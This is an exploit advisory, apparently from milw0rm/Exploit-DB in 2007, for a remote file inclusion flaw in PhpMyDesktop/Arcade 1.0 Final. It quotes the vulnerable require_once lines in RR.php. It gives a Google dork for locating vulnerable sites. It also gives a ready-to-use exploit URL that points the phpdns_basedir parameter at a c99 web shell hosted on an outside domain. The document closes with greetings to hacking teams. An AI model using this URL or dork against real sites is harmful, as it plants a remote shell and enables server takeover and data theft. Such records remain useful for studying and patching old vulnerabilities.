PhpMyDesktop/Arcade 1.0 Final - 'phpdns_basedir' Remote File Inclusion

EDB-ID:

4755

CVE:

N/A




Platform:

PHP

Date:

2007-12-18


# Name : PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) Remote File Include
# Download From : http://mesh.dl.sourceforge.net/sourceforge/pmd-arcade/pmd_arcade_1_0_final.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
# Google Dork : Powered by phpMyDesktop|arcade v1.0 (final)
============================================================================
# Vulne Code In File RR.php In Line 1 & 2 :
 
require_once("$phpdns_basedir/DNS/RR/A.php");
require_once("$phpdns_basedir/DNS/RR/AAAA.php");
# Exploit:
www.RxH.com/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://no-hack.fr/shells/c99.txt?

============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
H-T TeaM (no-hack.fr)
Str0ck
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT
Happy Aid All Muslims
Best Wishes

# milw0rm.com [2007-12-18]